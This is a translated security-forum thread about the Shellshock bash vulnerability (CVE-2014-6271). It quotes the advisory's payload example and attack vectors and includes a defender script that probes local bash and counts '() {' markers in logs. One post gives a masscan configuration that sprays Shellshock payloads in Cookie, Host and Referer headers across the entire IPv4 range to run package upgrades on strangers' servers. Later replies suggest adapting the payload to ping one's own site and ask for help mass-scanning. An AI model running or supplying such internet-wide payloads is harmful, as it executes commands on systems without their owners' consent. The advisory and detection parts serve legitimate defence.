SirGod

Bash - Remote Code Execution


Posted

Ugly. :-)

Mailing list: oss-security - CVE-2014-6271: remote code execution through bash

For the lazy ones:

Bash supports exporting not just shell variables, but also shell functions to other bash instances, via the process environment to (indirect) child processes. Current bash versions use an environment variable named by the function name, and a function definition starting with “() {” in the variable value to propagate function definitions through the environment. The vulnerability occurs because bash does not stop after processing the function definition; it continues to parse and execute shell commands following the function definition. For example, an environment variable setting of

VAR=() { ignored; }; /bin/id

will execute /bin/id when the environment is imported into the bash process. (The process is in a slightly undefined state at this point. The PATH variable may not have been set up yet, and bash could crash after executing /bin/id, but the damage has already happened at this point.)

The fact that an environment variable with an arbitrary name can be used as a carrier for a malicious function definition containing trailing commands makes this vulnerability particularly severe; it enables network-based exploitation.

So far, HTTP requests to CGI scripts have been identified as the major attack vector.

A typical HTTP request looks like this:

GET /path?query-param-name=query-param-value HTTP/1.1
Host: www.example.com
Custom: custom-header-value

The CGI specification maps all parts to environment variables. With Apache httpd, the magic string “() {” can appear in these places:

* Host (“www.example.com”, as REMOTE_HOST)
* Header value (“custom-header-value”, as HTTP_CUSTOM in this example)
* Server protocol (“HTTP/1.1”, as SERVER_PROTOCOL)

The user name embedded in an Authorization header could be a vector as well, but the corresponding REMOTE_USER variable is only set if the user name corresponds to a known account according to the authentication configuration, and a configuration which accepts the magic string appears somewhat unlikely.

In addition, with other CGI implementations, the request method (“GET”), path (“/path”) and query string (“query-param-name=query-param-value”) may be vectors, and it is conceivable for “query-param-value” as well, and perhaps even “query-param-name”.

The other vector is OpenSSH, either through AcceptEnv variables, TERM or SSH_ORIGINAL_COMMAND.

Other vectors involving different environment variables set by additional programs are expected.

Source: oss-security - Re: CVE-2014-6271: remote code execution through bash
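Two checks a defender would run against what the advisory above describes, added here as an example (this is not code from the original thread or from the oss-security post): a local probe of whether the installed bash still executes commands that trail an imported function definition, and a count of access-log lines carrying the “() {” marker in any request field. The log lines are constructed samples, and the function names are my own.

```shell
#!/bin/sh
# Added example, not part of the original thread: two defender-side checks for
# CVE-2014-6271. Needs only sh, grep, printf and (for the first check) bash.

# Check 1: does the local bash still run commands that trail an exported
# function definition? The probe exports a variable whose value starts with
# "() {" followed by "; echo vulnerable". A patched bash either ignores the
# definition or stops parsing at the closing brace, so "vulnerable" is never
# printed. Prints one of: vulnerable, patched, no-bash.
bash_function_import_status() {
    command -v bash >/dev/null 2>&1 || { echo no-bash; return 0; }
    out=$(env x='() { :; }; echo vulnerable' bash -c 'echo probe' 2>/dev/null)
    case "$out" in
        *vulnerable*) echo vulnerable ;;
        *)            echo patched ;;
    esac
}

# Check 2: count log lines that carry the function-definition marker in any
# field (User-Agent, Referer, request line, ...). Optional whitespace between
# "()" and "{" is allowed, since bash's importer accepts "(){" as well.
# Reads log lines on stdin and prints the count (0 when nothing matches).
count_shellshock_requests() {
    grep -Ec '\(\)[[:space:]]*\{' || true
}

# Constructed sample lines in Apache "combined" format (not real traffic):
# lines 1 and 2 carry the marker in the User-Agent and Referer fields, line 3
# is an ordinary request whose parenthesised User-Agent must not match.
SAMPLE_LOG='203.0.113.5 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; /bin/id"
203.0.113.6 - - [25/Sep/2014:10:01:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "(){ :; }; /bin/id" "Mozilla/5.0"
198.51.100.7 - - [25/Sep/2014:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"'

# Stand-alone usage: report both results.
printf 'local bash: %s\n' "$(bash_function_import_status)"
printf 'suspicious requests in sample log: %s\n' \
    "$(printf '%s\n' "$SAMPLE_LOG" | count_shellshock_requests)"
```

On a patched host the first line reads `local bash: patched` and the sample log yields 2. The log check is a coarse indicator: it is worth running over real access logs (`count_shellshock_requests < /var/log/apache2/access.log`) to see whether the CGI vector described above was tried against a server before it was updated, but the authoritative fix is the bash update itself, which the local probe confirms.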

Posted

#InfoSec good deed fairy
#Original from shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = InfosecFairy
http-header = Cookie:() { :; }; apt-get update -y; apt-get upgrade -y; yum update bash -y
http-header = Host:() { :; }; apt-get update -y; apt-get upgrade -y; yum update bash -y
http-header = Referer:() { :; }; apt-get update -y; apt-get upgrade -y; yum update bash -y

Using bashbug to patch bashbug :))

Posted
It would have been simpler if someone had just said it ... this way I have to sit and decipher one thing after another :)

You're hopeless. You have @Silviu's post with an example of "exploitation" in it; can't you replace the commands there with a ping to your own website, then look through the logs?

Posted
Wouldn't you rather make the effort to understand the vulnerability yourself?

From my point of view it's even worse than Heartbleed, for the simple reason that it can be exploited by almost anyone, even by florinul ^, and the chances of success are much higher

Sent from my phone using Tapatalk

You're wrong, he just asked in another post how to use it and why it doesn't work for him :))))

Posted
Can't anyone really help us run a masscan with it?

What do you want a mass-scan for? Do you happen to administer a large network and want to see which servers are affected so you can fix them? If so, I'll help you. :-)
